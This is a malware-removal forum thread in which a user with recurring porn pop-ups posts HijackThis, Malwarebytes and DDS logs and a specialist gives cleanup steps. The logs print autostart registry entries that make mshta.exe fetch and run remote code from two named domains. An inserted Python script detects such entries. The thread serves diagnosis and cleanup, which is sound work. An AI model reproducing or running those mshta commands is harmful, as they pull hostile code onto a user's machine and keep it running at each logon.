Tech Support Guy > Virus & Other Malware Removal
Solved: mshta.exe Japanese porn popup
gagraptor (Thread starter; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
23-May-2012, 04:34 PM #1
mshta.exe Japanese porn popup
I am constantly getting a pop-up from a Japanese porn site and the process it uses is MSHTA.exe. If I kill the process it pops up again after 15 or so minutes. I have included my HijackThis log below; I also ran Process Explorer on mshta and the command line under image is

C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=ir...u6qNCcCsJqkMCP


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:14:56 PM, on 5/23/2012
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.19222)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\Downloads\HijackThis.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/.../www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/...ch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/.../www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=ir...CsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

--
End of file - 9444 bytes

Please help, it's driving me nuts. Not keen on reformatting.
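As an added example (not from the thread or from any of the tools it mentions), this is the check a responder would script over the HijackThis log above: parse the O4 autostart entries and flag those that hand mshta.exe a remote URL or an inline script: protocol instead of a local .hta file, then list the registry values to remove. The sample lines are copied from the log; the ragmat.info URLs stay truncated with "..." exactly as HijackThis printed them, and the `Run`/`RunOnce` registry path it prints is the standard CurrentVersion location, assumed here from the `HKCU\..\Run` notation.

```python
"""Flag HijackThis O4 autostart entries that launch mshta.exe with a remote target.

A normal O4 entry points at a program on disk. The entries in this thread
instead start the signed Windows HTML Application host (mshta.exe) with an
http:// URL, so the payload lives on a web server and is fetched again at
every logon, which is why killing the process only buys a few minutes.
The fix is removing the Run/RunOnce values, not mshta.exe itself.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Sample input copied from the HijackThis log in the post above. HijackThis
# shortens long URLs with "..." and they are kept that way here.
SAMPLE_HJT_LINES = r"""
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=ir...CsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
"""

# Shape of an O4 line: "O4 - <hive>\..\<key>: [<value name>] <command> (User '<account>')"
O4_RE = re.compile(
    r"^O4 - (?P<hive>.+?)\\\.\.\\(?P<key>Run\w*): "
    r"\[(?P<name>[^\]]*)\] (?P<cmd>.*?)"
    r"(?: \(User '(?P<user>[^']*)'\))?$"
)
# mshta.exe takes a URL or an inline script: protocol where a .hta path would
# normally go; either way the HTA content is not a file on this machine.
REMOTE_ARG_RE = re.compile(r"^(?:https?|ftp)://|^(?:javascript|vbscript):", re.I)
HTA_HOSTS = {"mshta.exe", "mshta"}


@dataclass
class Finding:
    hive: str    # HijackThis hive label (HKCU, HKLM, HKUS\<sid>)
    key: str     # Run or RunOnce
    name: str    # registry value name
    image: str   # program the value launches
    target: str  # URL or script: argument handed to mshta
    host: str    # hostname from the URL, "" for script: protocols


def parse_o4(line: str):
    """Return the fields of one O4 line as a dict, or None if it is not an O4 line."""
    m = O4_RE.match(line.strip())
    return m.groupdict() if m else None


def split_command(cmd: str):
    """Split a Run value into (image, args); a quoted image path may contain spaces."""
    cmd = cmd.strip()
    end = cmd.find('"', 1) if cmd.startswith('"') else -1
    if end > 0:
        return cmd[1:end], cmd[end + 1:].split()
    image, _, rest = cmd.partition(" ")
    return image, rest.split()


def scan_hjt(text: str):
    """Return a Finding for every O4 entry that runs mshta against a remote target."""
    findings = []
    for line in text.splitlines():
        entry = parse_o4(line)
        if not entry:
            continue
        image, args = split_command(entry["cmd"])
        basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if basename not in HTA_HOSTS:
            continue
        for arg in args:
            if REMOTE_ARG_RE.match(arg):
                host = (urlsplit(arg).hostname or "") if "://" in arg else ""
                findings.append(Finding(entry["hive"], entry["key"], entry["name"], image, arg, host))
                break
    return findings


def registry_values(findings):
    """Registry values a responder removes; mshta.exe itself is a system file and stays."""
    base = r"Software\Microsoft\Windows\CurrentVersion"
    return sorted({f"{f.hive}\\{base}\\{f.key}\\{f.name}" for f in findings})


if __name__ == "__main__":
    found = scan_hjt(SAMPLE_HJT_LINES)
    for f in found:
        print(f"{f.hive} {f.key} [{f.name}] -> {f.image} {f.target} (host: {f.host or 'inline'})")
    print("\n".join(registry_values(found)))
```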
Mark1956 (Malware Removal Specialist with 14,074 posts; Join Date: May 2011; Location: Spain; Experience: Advanced)
25-May-2012, 05:25 AM #2
Hi Gagraptor and welcome to TSG, my name is Mark and I will be helping you.

At the top of the Malware forum there is a notice "Everyone MUST read this BEFORE posting for help in this forum".

As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow ALL the instructions and post the logs that are requested.

DO NOT make any attempt to delete mshta.exe as it is a legitimate system file.

I would also like you to do the following and post the logs, as follows:
Put the logs into separate posts if it makes it easier.

STEP 1
Run HijackThis, and press "Scan." When the scan is complete place a check mark next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
NOTE For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
For Vista, click on Start and type User Accounts in the search box and hit Enter, click on Turn User Account Control on or off, uncheck the box to turn off UAC. For Windows 7 click on Start and type UAC in the box and hit Enter, then move the slider all the way to the bottom and click on ok. This action is not required for Windows XP.

O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)

After checking these items CLOSE ALL open windows except HijackThis and click "Fix Checked" to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose YES. Once it has fixed them, close HijackThis.
If you receive an error message that indicates HJT cannot remove the entries please try disabling your security software (see: How to disable your security software).
If after disabling your security software there is still a problem, this could be due to the Malware on your system.
Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
Follow this by opening HJT, go to the Main Menu and Click on "Do a system scan and save logfile." When the log pops up in Notepad, copy and paste that file back here in your next reply.


STEP 2

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.
  • Double-click on the renamed file to install, then follow these instructions for doing a Quick Scan in normal mode.
  • Don't forget to check for database definition updates through the program's interface (preferable method) before scanning.
  • If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues.
Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's TeaTimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Double click on the Malwarebytes icon on your desktop to launch the program
  • Under the Scanner tab, make sure the Perform Quick Scan option is selected.
  • Click on the Scan button.
  • When finished, a message box will say "The scan completed successfully. Click Show Results to display all objects found".
  • Click OK to close the message box, then click the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked and then click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
  • Exit Malwarebytes when done.
If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally will prevent Malwarebytes from removing all the malware.

Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again requires registration and purchase of a license key that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license; you can just use it as a stand-alone scanner.
NOTE: Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).

Last edited by Mark1956; 25-May-2012 at 05:45 AM.
gagraptor (Thread starter; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 04:26 AM #3
I am sorry, I forgot to add the other logs. I have followed your instructions. I already had Malwarebytes; when I run it I get 3 trojans and I'm asked to restart. After restarting, when I run Malwarebytes again I get the same 3 viruses. I am not able to run GMER as my system freezes.
I'm including all the other logs. PS: I also have virtual drive emulation s/w but can't find it to uninstall.
gagraptor (Thread starter; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 04:27 AM #4
Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/28/2012 1:28:46 AM
mbam-log-2012-05-28 (01-28-46).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 204053
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=...CsJqkMCP&log=1 -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)
gagraptor (Thread starter; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 04:28 AM #5
.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 3:16:57 on 2012-05-28
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\rundll32.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\System32\alg.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\rundll32.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mStart Page = hxxp://home.sweetim.com
mDefault_Page_URL = hxxp://www.yahoo.com/
mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
mSearchAssistant =
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: DivX Plus Web Player HTML5 <video>: {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [<NO NAME>]
uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=...CsJqkMCP&log=1
uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP
